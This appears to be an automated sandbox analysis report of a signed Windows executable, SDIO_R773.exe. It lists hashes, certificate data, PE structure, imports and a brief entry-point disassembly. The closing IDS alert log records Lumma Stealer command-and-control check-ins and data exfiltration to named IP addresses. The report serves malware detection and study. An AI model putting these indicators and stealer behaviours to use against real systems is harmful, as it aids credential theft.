                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                            File name:SDIO_R773.exe
                                                                                                                                                                                                                                            File size:5'304'144 bytes
                                                                                                                                                                                                                                            MD5:c45a36ec4b4f8d8412c60db459c2b9d2
                                                                                                                                                                                                                                            SHA1:5c67453947128df910b46d5356f2ac5a8bae0cc9
                                                                                                                                                                                                                                            SHA256:24a26ac9cd209bf84831dae7d778fceb46b1e30b48454c130a6e62accdc1369e
                                                                                                                                                                                                                                            SHA512:c1250b9ccdee087433b1ccb1b277a8cc97dff16aeb99ce366356eecb457910297a3e592c1e379f566dfbdaa565f1b347a65c828a3072825f0457b1e7ddb72c1f
                                                                                                                                                                                                                                            SSDEEP:98304:JvoSyiXIQu22Q+LFmIFSy3WNxB5PlRqt+0GIKMZgOaP3oL+M1p+Plrdfoh:Jv19XLu22r0IFf3WTPlot+0hSr3oL+M7
                                                                                                                                                                                                                                            TLSH:F4366D5AFB4365F4F52356718A4FE77F8B146E368022DD6BFB0EEA08B4735162809312
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!Rg..................1..RK...............1...@...........................S.......Q....... ............................
                                                                                                                                                                                                                                            Icon Hash:96130b9632311b19
                                                                                                                                                                                                                                            Entrypoint:0x4014a0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                                                            Time Stamp:0x675221BA [Thu Dec 5 21:57:14 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:0x5e2050, 0x5e2000
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:5d6fd7b1c30a5b028e18dcdea9485e90
                                                                                                                                                                                                                                            Signature Valid:true
                                                                                                                                                                                                                                            Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                            Error Number:0
Not Before:26/11/2024 12:07:48
Not After:26/11/2025 12:07:47
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=T H SUPPORT SERVICES LTD, O=T H SUPPORT SERVICES LTD, STREET=Suites 10s And 11s Trafford House Chester Road, PostalCode=M32 0RS, L=Stretford, S=Greater Manchester, C=GB, SERIALNUMBER=07890919, OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:99CC43DD50C8C235E6703FBFE86B0302
                                                                                                                                                                                                                                            Thumbprint SHA-1:21297766029D043DFBA740CD5203E45171FC8EAA
                                                                                                                                                                                                                                            Thumbprint SHA-256:0A2CAAF3A1E6490DE521CCCA8452705AF0BD9A4A91D7F02CD8D3588404BCF77C
                                                                                                                                                                                                                                            Serial:502F183B00B497DFC821D09DEB30526B
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                                                                            mov dword ptr [0086B618h], 00000000h
                                                                                                                                                                                                                                            call 00007F3B386CF583h
                                                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                                                            jmp 00007F3B384EE80Bh
                                                                                                                                                                                                                                            lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                                            sub esp, 1Ch
                                                                                                                                                                                                                                            mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                                            mov dword ptr [esp], eax
                                                                                                                                                                                                                                            call 00007F3B386E3A26h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            sete al
                                                                                                                                                                                                                                            add esp, 1Ch
                                                                                                                                                                                                                                            movzx eax, al
neg eax
ret
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 0072D000h
call dword ptr [0086FB60h]
sub esp, 04h
test eax, eax
je 00007F3B384EEBE5h
mov ebx, eax
mov dword ptr [esp], 0072D000h
call dword ptr [0086FBD8h]
sub esp, 04h
mov edi, dword ptr [0086FB6Ch]
mov dword ptr [0086C054h], eax
mov dword ptr [esp+04h], 0072D013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 0072D029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [0071E004h], eax
test esi, esi
je 00007F3B384EEB83h
mov dword ptr [esp+04h], 0084201Ch
mov dword ptr [esp], 0077A0F8h
call esi
mov dword ptr [esp], 00401590h
call 00007F3B384EEAD3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x46f000 | 0x3bd8 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x475000 | 0xc9200 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x50c600 | 0x2950 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x359fb0 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x46f9b0 | 0x85c | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x31cd28 | 0x31ce00 | 3b22b1e6738968eb93aea86395f7021d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x31e000 | 0xe77c | 0xe800 | 39e9c61d90970028d4af91a719734105 | False | 0.5714574353448276 | data | 5.3596325539155085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x32d000 | 0x4c4c0 | 0x4c600 | f896d149db53c76cb46bbc618020cad0 | False | 0.30581590118657936 | data | 5.6345238476754185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ |
| .eh_fram | 0x37a000 | 0xc72ac | 0xc7400 | 6599374241c3f36e51c5118481049b5d | False | 0.23927741726787954 | data | 5.044033366938541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ |
| .bss | 0x442000 | 0x2c500 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x46f000 | 0x3bd8 | 0x3c00 | b488a8aee2cf3814357b6f5f38893ec9 | False | 0.3610026041666667 | data | 5.637024406272127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .CRT | 0x473000 | 0x34 | 0x200 | 86953374f74d9c8ce782dbf0c3749ecb | False | 0.0703125 | Matlab v4 mat-file (little endian) \240\036^, numeric, rows 4198672, columns 0 | 0.25861184145657956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x474000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x475000 | 0xc9200 | 0xc9200 | eea40cb7b52896e6aabfadf57d1d9990 | False | 0.5559657104568054 | data | 7.409085150031166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |


| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_BITMAP | 0x475718 | 0xc028 | Device independent bitmap graphic, 128 x 128 x 24, image size 0, resolution 3779 x 3779 px/m | English | United States | 0.2833184257602862 |
| RT_BITMAP | 0x481740 | 0x25ba0 | Device independent bitmap graphic, 164 x 314 x 24, image size 0, resolution 3778 x 3778 px/m | English | United States | 0.5488196313936633 |
| RT_ICON | 0x4a72e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | English | United States | 0.4115853658536585 |
| RT_ICON | 0x4a8388 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 2048 | English | United States | 0.6922382671480144 |
| RT_ICON | 0x4a8c30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 2048 | English | United States | 0.5904255319148937 |
| RT_ICON | 0x4a9098 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 512 | English | United States | 0.5151734104046243 |
| RT_DIALOG | 0x4a9600 | 0x1cc | data | English | United States | 0.5543478260869565 |
| RT_DIALOG | 0x4a97cc | 0x324 | data | English | United States | 0.46766169154228854 |
| RT_DIALOG | 0x4a9af0 | 0xdc | data | English | United States | 0.6681818181818182 |
| RT_DIALOG | 0x4a9bcc | 0x3ac | data | English | United States | 0.4372340425531915 |
| RT_DIALOG | 0x4a9f78 | 0x31a | data | English | United States | 0.4005037783375315 |
| RT_DIALOG | 0x4aa294 | 0x200 | data | English | United States | 0.419921875 |
| RT_DIALOG | 0x4aa494 | 0x2b6 | data | English | United States | 0.44668587896253603 |
| RT_DIALOG | 0x4aa74c | 0x9ba | data | English | United States | 0.3461847389558233 |
| RT_DIALOG | 0x4ab108 | 0xb9c | data | English | United States | 0.3495962314939435 |
| RT_DIALOG | 0x4abca4 | 0x286 | data | English | United States | 0.4953560371517028 |
| RT_DIALOG | 0x4abf2c | 0x30e | data | English | United States | 0.43478260869565216 |
| RT_DIALOG | 0x4ac23c | 0x48c | data | English | United States | 0.40893470790378006 |
| RT_DIALOG | 0x4ac6c8 | 0x3cc | data | English | United States | 0.37037037037037035 |
| RT_DIALOG | 0x4aca94 | 0x4f8 | data | English | United States | 0.375 |
| RT_DIALOG | 0x4acf8c | 0x11a | data | English | United States | 0.6170212765957447 |
| RT_GROUP_ICON | 0x4ad0a8 | 0x3e | data | English | United States | 0.7903225806451613 |
| RT_VERSION | 0x4ad0e8 | 0x394 | OpenPGP Secret Key | English | United States | 0.4814410480349345 |
| RT_MANIFEST | 0x4ad47c | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |
| None | 0x4ad5fc | 0x94f1 | ASCII text, with CRLF line terminators | English | United States | 0.12809147892680112 |
| None | 0x4b6af0 | 0x6444 | Unicode text, UTF-8 (with BOM) text, with very long lines (410), with CRLF line terminators | English | United States | 0.2990494000311672 |
| None | 0x4bcf34 | 0x8c3c | ASCII text, with CRLF line terminators | English | United States | 0.3435933147632312 |
| None | 0x4c5b70 | 0xa2 | RIFF (little-endian) data, Web/P image | English | United States | 1.0679012345679013 |
| None | 0x4c5c14 | 0xa4 | RIFF (little-endian) data, Web/P image | English | United States | 1.0670731707317074 |
| None | 0x4c5cb8 | 0xa2 | RIFF (little-endian) data, Web/P image | English | United States | 1.0679012345679013 |
| None | 0x4c5d5c | 0xa4 | RIFF (little-endian) data, Web/P image | English | United States | 1.0670731707317074 |
| None | 0x4c5e00 | 0x13501 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.32917009038619555 |
| None | 0x4d9304 | 0x12f6 | ASCII text, with CRLF line terminators | English | United States | 0.36402966625463534 |
| None | 0x4da5fc | 0xcaea | RIFF (little-endian) data, Web/P image | English | United States | 0.9969198783351942 |


| DLL | Import |
| --- | --- |
| ADVAPI32.dll | AdjustTokenPrivileges, GetFileSecurityW, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegDeleteValueW, RegEnumKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, SetFileSecurityW |
| COMCTL32.DLL | InitCommonControlsEx, PropertySheetW |
| COMDLG32.DLL | GetOpenFileNameW |
| GDI32.dll | BitBlt, CreateBitmap, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, CreateFontW, CreatePen, CreateRectRgn, CreateRectRgnIndirect, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, GetObjectW, GetStockObject, GetTextExtentPoint32W, LineTo, MoveToEx, Rectangle, RoundRect, SelectClipRgn, SelectObject, SetBkColor, SetBkMode, SetDCBrushColor, SetLayout, SetStretchBltMode, SetTextColor, StretchBlt, TextOutW |
                                                                                                                                                                                                                                            KERNEL32.dllCancelIo, CloseHandle, CompareFileTime, CopyFileExW, CopyFileW, CreateDirectoryW, CreateEventA, CreateEventW, CreateFileA, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateProcessW, CreateSemaphoreA, CreateSemaphoreW, CreateWaitableTimerW, DeleteCriticalSection, DeleteFileW, DeviceIoControl, DosDateTimeToFileTime, EnterCriticalSection, EnumSystemLanguageGroupsW, ExpandEnvironmentStringsW, FileTimeToDosDateTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationW, FindFirstFileW, FindNextFileW, FindResourceW, FormatMessageA, FormatMessageW, FreeLibrary, GetCommState, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetConsoleScreenBufferInfo, GetConsoleWindow, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetLastError, GetLogicalDriveStringsW, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOverlappedResult, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoA, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemPowerStatus, GetSystemTimeAsFileTime, GetTempFileNameW, GetTempPathW, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetVersionExW, GetVolumeInformationW, GetWindowsDirectoryW, GlobalAlloc, GlobalLock, GlobalMemoryStatus, GlobalMemoryStatusEx, GlobalUnlock, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, LoadResource, 
LocalFree, MapViewOfFile, MoveFileExW, MoveFileW, MultiByteToWideChar, OpenEventW, OpenFileMappingW, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, QueueUserAPC, ReadDirectoryChangesW, ReadFile, ReadFileScatter, RegisterWaitForSingleObject, ReleaseMutex, ReleaseSemaphore, RemoveDirectoryW, ResetEvent, SetCommState, SetCommTimeouts, SetConsoleCtrlHandler, SetConsoleMode, SetCurrentDirectoryW, SetEndOfFile, SetEvent, SetFileApisToOEM, SetFileAttributesW, SetFilePointer, SetFilePointerEx, SetFileTime, SetLastError, SetProcessAffinityMask, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, SizeofResource, Sleep, SleepEx, SystemTimeToFileTime, TerminateProcess, TerminateThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UnmapViewOfFile, UnregisterWaitEx, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, VirtualUnlock, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WideCharToMultiByte, WriteFile, WriteFileGather, lstrcmpW, lstrcmpiW, lstrcpyW
                                                                                                                                                                                                                                            MSIMG32.DLLAlphaBlend
                                                                                                                                                                                                                                            msvcrt.dll___mb_cur_max_func, __doserrno, __getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __pioinfo, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _errno, _fdopen, _filelengthi64, _fileno, _fileno, _fstat64, _getcwd, _initterm, _iob, _isatty, _lock, _lseeki64, _onexit, _read, _setjmp3, _snwprintf, _strcmpi, _strnicmp, _unlock, _vsnwprintf, _wcsicmp, _wfopen, _wfsopen, _wgetcwd, _wmkdir, _wremove, _wrename, _write, _write, _wtoi, abort, atoi, atol, calloc, exit, fclose, feof, ferror, fflush, fgetc, fgetpos, fgetws, fopen, fprintf, fputc, fputs, fputws, fread, free, gmtime, fsetpos, fwprintf, fwrite, getc, getenv, getwc, islower, isspace, isupper, iswctype, iswspace, isxdigit, localeconv, localtime, longjmp, malloc, mbtowc, memchr, memcmp, memcpy, memmove, memset, putc, putwc, rand, realloc, setlocale, setvbuf, signal, sprintf, srand, strcat, strchr, strcmp, strcoll, strcpy, strerror, strftime, strlen, strncmp, strncpy, strrchr, strstr, strtol, strtoul, strxfrm, time, swscanf, system, tolower, toupper, towlower, towupper, ungetc, ungetwc, vfprintf, vswprintf, wcscat, wcschr, wcscmp, wcscoll, wcscpy, wcscspn, wcsftime, wcslen, wcsncat, wcsncpy, wcsrchr, wcsstr, wcstol, wcstombs, wcstoul, wcsxfrm, wctomb
                                                                                                                                                                                                                                            newdev.dllUpdateDriverForPlugAndPlayDevicesW
                                                                                                                                                                                                                                            ole32.dllCoCreateInstance, CoInitialize, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize
                                                                                                                                                                                                                                            OLEAUT32.dllSafeArrayDestroy, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SysAllocString, SysAllocStringLen, SysFreeString, SysStringLen, VariantClear, VariantCopy
                                                                                                                                                                                                                                            SETUPAPI.dllCM_Get_DevNode_Status, SetupDiDestroyDeviceInfoList, SetupDiEnumDeviceInfo, SetupDiGetClassDescriptionW, SetupDiGetClassDevsW, SetupDiGetDeviceInstanceIdW, SetupDiGetDeviceRegistryPropertyW, SetupDiLoadClassIcon
                                                                                                                                                                                                                                            SHELL32.dllCommandLineToArgvW, DragAcceptFiles, DragFinish, DragQueryFileW, SHBrowseForFolderW, SHFormatDrive, SHGetPathFromIDListW, ShellExecuteExW, ShellExecuteW, StrStrIA, StrStrIW
                                                                                                                                                                                                                                            SHLWAPI.dllPathFileExistsW, PathGetDriveNumberW, PathRemoveFileSpecW, StrFormatByteSizeW
                                                                                                                                                                                                                                            USER32.dllAdjustWindowRectEx, BeginPaint, CallWindowProcW, CharUpperW, ClientToScreen, CloseClipboard, CreateDialogParamW, CreateIconIndirect, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DeleteMenu, DestroyIcon, DestroyWindow, DialogBoxParamW, DispatchMessageW, DrawFrameControl, DrawIconEx, DrawTextW, EmptyClipboard, EnableWindow, EndDialog, EndPaint, EnumChildWindows, EnumDisplayDevicesW, FlashWindowEx, GetClassNameW, GetClientRect, GetCursorPos, GetDC, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetForegroundWindow, GetIconInfo, GetMenuItemCount, GetMenuItemInfoW, GetMonitorInfoW, GetParent, GetScrollInfo, GetSysColor, GetSystemMenu, GetSystemMetrics, GetWindowInfo, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, GetWindowThreadProcessId, InsertMenuItemW, InsertMenuW, InvalidateRect, IsDlgButtonChecked, IsWindow, IsZoomed, KillTimer, LoadCursorW, LoadIconW, MapWindowPoints, MessageBoxW, MonitorFromPoint, MoveWindow, MsgWaitForMultipleObjectsEx, OffsetRect, OpenClipboard, PeekMessageW, PostMessageW, PostQuitMessage, RealGetWindowClassW, RegisterClassExW, ReleaseCapture, ReleaseDC, ScreenToClient, SendDlgItemMessageW, SendMessageW, SetActiveWindow, SetCapture, SetClipboardData, SetCursor, SetCursorPos, SetDlgItemTextW, SetFocus, SetForegroundWindow, SetLayeredWindowAttributes, SetMenuItemInfoW, SetScrollInfo, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextA, SetWindowTextW, ShowWindow, SwitchToThisWindow, SystemParametersInfoW, TrackMouseEvent, TrackPopupMenu, TranslateMessage, UnregisterClassW, wsprintfA, wsprintfW, wvsprintfA
                                                                                                                                                                                                                                            WS2_32.dllWSAAddressToStringA, WSAIoctl, WSARecv, WSARecvFrom, WSASend, WSASendTo, WSASocketW, WSAStringToAddressA, freeaddrinfo, getaddrinfo, getnameinfo
                                                                                                                                                                                                                                            WSOCK32.DLLAcceptEx, GetAcceptExSockaddrs, WSACleanup, WSAGetLastError, WSASetLastError, WSAStartup, __WSAFDIsSet, accept, bind, closesocket, connect, gethostname, getpeername, getsockname, getsockopt, htonl, htons, ioctlsocket, listen, ntohl, ntohs, select, setsockopt, shutdown, socket
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T11:56:11.578646+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-11T11:56:12.096510+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-11T11:56:12.691095+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:12.815363+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:12.815363+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.296659+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.795382+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.795382+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:14.845942+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:27.599440+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:28.095111+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | TCP
